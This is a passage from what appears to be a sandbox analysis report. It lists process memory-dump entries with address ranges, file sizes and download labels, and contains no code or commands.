                                                                                                                                                                    10.8MB

                                                                                                                                                                    Download

                                                                                                                                                                  • memory/4444-15-0x0000022F7F800000-0x0000022F7F83C000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    240KB

                                                                                                                                                                    Download

                                                                                                                                                                  • memory/4444-0-0x00007FFAED7D3000-0x00007FFAED7D5000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    8KB

                                                                                                                                                                    Download

                                                                                                                                                                  • memory/4444-16-0x00007FFAED7D0000-0x00007FFAEE292000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    10.8MB

                                                                                                                                                                    Download

                                                                                                                                                                  • memory/4564-210-0x00007FFB0B200000-0x00007FFB0B2BD000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    756KB

                                                                                                                                                                    Download

                                                                                                                                                                  • memory/4564-207-0x00007FFB0C5D0000-0x00007FFB0C7C8000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    2.0MB

                                                                                                                                                                    Download

                                                                                                                                                                  • memory/4724-203-0x00007FFB0C5D0000-0x00007FFB0C7C8000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    2.0MB

                                                                                                                                                                    Download

                                                                                                                                                                  • memory/4724-204-0x00007FFB0B200000-0x00007FFB0B2BD000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    756KB

                                                                                                                                                                    Download

                                                                                                                                                                  • memory/4868-36-0x00007FFAED7D0000-0x00007FFAEE292000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    10.8MB

                                                                                                                                                                    Download

                                                                                                                                                                  • memory/4868-1298-0x00007FFAED7D0000-0x00007FFAEE292000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    10.8MB

                                                                                                                                                                    Download

                                                                                                                                                                  • memory/4868-42-0x000001F1085C0000-0x000001F1086E6000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    1.1MB

                                                                                                                                                                    Download

                                                                                                                                                                  • memory/4868-39-0x000001F1082A0000-0x000001F1082F8000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    352KB

                                                                                                                                                                    Download

                                                                                                                                                                  • memory/4868-38-0x000001F108000000-0x000001F10829E000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    2.6MB

                                                                                                                                                                    Download

                                                                                                                                                                  • memory/4868-43-0x00007FFB0C5D0000-0x00007FFB0C7C8000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    2.0MB

                                                                                                                                                                    Download

                                                                                                                                                                  • memory/4868-40-0x00007FFB0C5D0000-0x00007FFB0C7C8000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    2.0MB

                                                                                                                                                                    Download

                                                                                                                                                                  • memory/4868-33-0x000001F17E400000-0x000001F17E422000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    136KB

                                                                                                                                                                    Download

                                                                                                                                                                  • memory/4868-34-0x00007FFAED7D0000-0x00007FFAEE292000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    10.8MB

                                                                                                                                                                    Download

                                                                                                                                                                  • memory/4868-41-0x00007FFB0B200000-0x00007FFB0B2BD000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    756KB

                                                                                                                                                                    Download

                                                                                                                                                                  • memory/4868-37-0x000001F17E800000-0x000001F17F64A000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    14.3MB

                                                                                                                                                                    Download

                                                                                                                                                                  • memory/4868-86-0x00007FFAED7D0000-0x00007FFAEE292000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    10.8MB

                                                                                                                                                                    Download

                                                                                                                                                                  • memory/4868-35-0x00007FFAED7D0000-0x00007FFAEE292000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    10.8MB

                                                                                                                                                                    Download

                                                                                                                                                                  • memory/5032-234-0x00007FFB0B200000-0x00007FFB0B2BD000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    756KB

                                                                                                                                                                    Download

                                                                                                                                                                  • memory/5032-233-0x00007FFB0C5D0000-0x00007FFB0C7C8000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    2.0MB

                                                                                                                                                                    Download

                                                                                                                                                                  • memory/5088-220-0x00007FFB0B200000-0x00007FFB0B2BD000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    756KB

                                                                                                                                                                    Download

                                                                                                                                                                  • memory/5088-219-0x00007FFB0C5D0000-0x00007FFB0C7C8000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    2.0MB

                                                                                                                                                                    Download

                                                                                                                                                                  • memory/6060-1396-0x0000000000A80000-0x0000000000A96000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    88KB

                                                                                                                                                                    Download